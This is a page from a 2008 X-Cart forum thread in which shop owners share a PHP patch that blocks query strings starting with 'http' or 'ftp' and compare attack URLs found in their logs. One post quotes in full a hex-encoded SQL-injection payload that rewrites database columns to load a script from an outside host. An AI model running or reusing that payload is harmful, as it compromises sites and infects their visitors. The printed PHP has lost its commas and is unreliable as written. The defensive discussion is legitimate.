X-Cart: shopping cart software
Page 5 of 8 « First < 34 5 67 > Last »
Show 40 posts from this thread on one page

X-Cart forums (https://forum.x-cart.com/index.php)
-   Dev Questions (https://forum.x-cart.com/forumdisplay.php?f=20)
-   -   [PATCH] Blocking those pesky hackers (https://forum.x-cart.com/showthread.php?t=38748)

Scotty85 06-06-2008 11:11 AM
Re: [PATCH] Blocking those pesky hackers
 
I figured there had to be a way to make the part before the HTTP a wildcard of some kind. 8)

One more reason to learn more about PHP. I dabble enough to be dangerous and can reverse-engineer it with the best of them.... just don't fully get the syntax sometimes.

intel352 06-06-2008 11:15 AM
Re: [PATCH] Blocking those pesky hackers
 
won't be using a wildcard, will likely do a strpos() for the '=' sign, then explode() the value if it's there, and THEN use the substr() function to check for http, ftp, etc.

I'll leave you with that to see if you can piece together the solution in actual php :-)

Scotty85 06-06-2008 12:57 PM
Re: [PATCH] Blocking those pesky hackers
 
Heh.... I'm not THAT good... LOL


:D/

imexhouse 06-06-2008 08:30 PM
Re: [PATCH] Blocking those pesky hackers
 
3 Attachment(s)
Here are the two patches plus the sql file for 4.0.x
I tested them on my 4.0.19 and they're working fine.

intel352 06-07-2008 10:13 AM
Re: [PATCH] Blocking those pesky hackers
 
@imexhouse: thanks for your contribution!

Hi Scott, this should work:

PHP Code:
##
## Added for security purposes!
##
$stop_user false;
parse_str($_SERVER['QUERY_STRING'], $_qs);
if($_qs) {
    foreach($_qs AS $k=>$v) {
        if(substr($v04)=='http' || substr($v03)=='ftp') {
            if(!empty($active_modules["Stop_List"])) {
                func_add_ip_to_slist($REMOTE_ADDR'H');
            }
            $stop_user true;
        }
    }


mltriebe 06-07-2008 10:30 AM
Re: [PATCH] Blocking those pesky hackers
 
Quote:
Originally Posted by intel352
@imexhouse: thanks for your contribution!

Hi Scott, this should work:

PHP Code:
##
## Added for security purposes!
##
$stop_user false;
parse_str($_SERVER['QUERY_STRING'], $_qs);
if($_qs) {
    foreach($_qs AS $k=>$v) {
        if(substr($v04)=='http' || substr($v03)=='ftp') {
            if(!empty($active_modules["Stop_List"])) {
                func_add_ip_to_slist($REMOTE_ADDR'H');
            }
            $stop_user true;
        }
    }

Where does this code go, in the auth.php file?

Thanks, Mike

intel352 06-07-2008 10:44 AM
Re: [PATCH] Blocking those pesky hackers
 
1 Attachment(s)
Hi Mike, yes, it replaces *some* of the code that you would have already added, using the patch file.

So nothing gets confused in copy/paste, here's an updated patch file.

EDIT: if you want to use the patch file via X-Cart admin, you'll need to reverse the previous patch (by uploading it to Patch/Upgrade and selecting "yes" for Reverse).
Then you'll need to apply this patch.

Cheers

Scotty85 08-10-2008 07:30 AM
Re: [PATCH] Blocking those pesky hackers
 
I started getting these URLs in the Users Online log. Is there a way I can block these too?

HTML Code:


.../home.php?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);

clik 08-10-2008 05:23 PM
Re: [PATCH] Blocking those pesky hackers
 
I've been getting the same code in my logs (;DECLARE%20@S%20CHAR(4000); ....). I did some research: http://isc.sans.org/diary.html?storyid=4844

timbrrr 08-17-2008 08:11 AM
Re: [PATCH] Blocking those pesky hackers
 
Noticing a lot of these too... anyone got a good solution to block these? They appear to be coming from many different IP addresses, so individual IP blocks would be impratical.
Even if they arent getting in, it would be good to have a way to deflect them before they do figure out a way in.

/?';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST%20AS%20 CHAR(4000));ExEC(@S);............................. ...........................

(theres about 1200 characters total according a text editor that I pasted it into that does character count. )


All times are GMT -8. The time now is 02:13 AM.
Page 5 of 8 « First < 34 5 67 > Last »
Show 40 posts from this thread on one page

Powered by vBulletin Version 3.5.4
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.